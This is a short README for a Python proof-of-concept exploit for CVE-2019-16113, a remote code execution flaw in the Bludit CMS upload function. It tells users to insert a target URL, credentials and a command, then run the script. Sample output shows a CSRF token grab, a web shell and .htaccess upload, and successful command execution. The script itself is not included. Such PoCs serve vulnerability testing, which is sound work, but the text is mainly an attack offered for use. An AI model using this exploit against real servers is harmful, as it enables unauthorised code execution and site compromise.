Bludit >= 3.9.2 Remote Code Execution Vulnerability via "Upload function".
Simple Python PoC.
Discovery by @christasa: bludit/bludit#1081
Edit the script with your URL, username, password and command to execute then run the script:
$ python CVE-2019-16113.py
[+] Loggin successful.
[+] Token CSRF: 20b903ffe72490f004b9255521ea2e0419e73dce
[+] Shell upload succesful.
[+] .htaccess upload succesful.
[+] Command execution successful.- Python 3
- requests (
pip install requests)